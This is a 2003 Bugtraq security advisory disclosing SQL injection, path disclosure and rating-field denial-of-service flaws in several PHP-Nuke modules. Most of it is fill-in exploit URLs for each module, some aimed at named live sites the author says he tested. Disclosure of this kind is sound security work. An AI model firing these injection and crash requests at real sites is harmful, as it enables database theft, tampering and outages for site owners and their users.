Home page logo
/

bugtraq logo Bugtraq mailing list archives

PHP-Nuke Denial of Service attack and more SQL Injections
From: Lorenzo Manuel Hernandez Garcia-Hierro <security () lorenzohgh com>
Date: 18 May 2003 10:01:30 -0000



-------
Product: PHP-Nuke
Vendor: Francisco Burzi
Versions Vulnerable: 
Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 6.5 RC3
Francisco Burzi PHP-Nuke 6.5 RC2
Francisco Burzi PHP-Nuke 6.5 RC1
Francisco Burzi PHP-Nuke 6.5 FINAL
Francisco Burzi PHP-Nuke 6.5 BETA 1
Francisco Burzi PHP-Nuke 6.5
                         6.5 with all patches , 
                         6.0 with  all patches. 
                         5.5 with all patches 

No vulnerable: 
?
------
DESCRIPTION:
------
New SQL Injections and Paths Disclosures related to the main modules.
Please , look at the final ` , other sql injections don't use this but 
this 
very important for make a successful query.
--------
FOUND VULNERABLE MODULES:
--------

--------
- SECTIONS (NEW)
--------
Type: SQL Injection and Path Disclosure 
*********
Exploit:  
http://[target]/modules.php?name=Sections&op=listarticles&secid=`[YOUR 
QUERY] (NEW)
-
http://[target]/modules.php?name=Sections&op=viewarticle&artid=`[YOUR 
QUERY] (NEW)
-
http://[target]/modules.php?name=Sections&op=printpage&artid==`[YOUR 
QUERY] (NEW)

--------
-AVANTGO
--------
Type: SQL Injection and Path disclosure. (NEW)
*********
Exploit: 
http://[target]/modules.php?name=AvantGo&file=print&sid=`[YOUR QUERY]

--------
-SURVEYS (NEW)
--------
Type: SQL Injection and Path disclosure.
********
Exploit:

http://[target]/modules.php?name=Surveys&pollID=`[YOUR QUERY]
-
http://[target]/modules.php?name=Surveys&op=results&pollID=`[YOUR QUERY]
&mode=&order=0&thold=0

--------
-DOWNLOADS
--------
Type: SQL Injection and Path disclosure. (NEW)
********
Exploit:
http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR 
QUERY]
-
http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR 
QUERY]&orderby=titleD

-------------
NEW TYPE OF PHPNUKE ATTACK IN DOWNLOADS MODULE (NEW)
-------------
I found a denial of service possible attack in Downloads module trought 
rating system, 
Exploit:
http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FILE 
TO RATE]&ratinguser=?&ratinghost_name=?
&rating=999999999999999999999999999999999999999999999999999999999999999999
99999
When the file is rated the file gets a 238,609,298.89 rating , this can 
be used for make a denial of service attack to the mysql server or send a 
very long buffer (buffer overflow, stack crashes). The mysql server puts 
this because there's and error with the query ( more characters in field 
than the allowed number of characters) if you send a buffer more long 
than the allowed/accepted the server be unstable and the system pick up.

Exploit to SQL Injection and Denial of Service Attack:

http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FILE 
TO RATE]&ratinguser=?&ratinghost_name=?&rating=`[HERE GOES SQL QUERY]

--------
- REVIEWS (NEW)
--------
Type: SQL Injection and Path disclosure.
********
Exploit:
http://[target]/modules.php?name=Reviews&rop=showcontent&id=`[YOUR QUERY]
--------
- WEB_LINKS
--------
Type: SQL Injection (NEW) and Path disclosure.(NEW)
********
Exploit:
http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=`[YOUR QUERY]
-
http://[target]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=`
[YOUR QUERY]&ratetype=num

- Web-Links module is affected by the DoS possible attack that i 
discovered and the SQL Injections and buffer overflows:
 
Exploit:

http://[target]/modules.php?name=Web_Links&ratinglid=96&ratinguser=?
&ratinghost_name=?&rating=[DATA]

[DATA] = your random data to send ( rating points and the field buffer , 
of course ).
--------
SOLUTION:
--------
- Deactivate enterelly the affected modules.
- A temporal workaround for Path Disclosure is configuring in php.ini the 
reported error flags ( no report) but this is not very good solution ( 
WORKAROUND).
-----
WHAT CAN BE HAPPEN? AND NOTES
-----
Gain Access to phpnuke database , content changing , gain access to 
private info, server paths reveled. Mysql server buffer overflow,Mysql 
server pick up , server pick up.
-NOTES-
I tested it in phpnuke-espanol.org and it is vulnerable to all.
I tested it in phpnuke.org and it is vulnerable on active modules 
affected by this ( Downloads, Surveys )( some errors aren't reported 
because php.ini is configured for this but the vulnerabilities are 
present.).
-----
CONTACT INFO :
---------------------------------------
Lorenzo Manuel Hernandez Garcia-Hierro
--- Computer Security Analyzer ---
--www.novappc.com --
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1  4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************


  By Date           By Thread  

Current thread:
  • PHP-Nuke Denial of Service attack and more SQL Injections Lorenzo Manuel Hernandez Garcia-Hierro (May 20)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]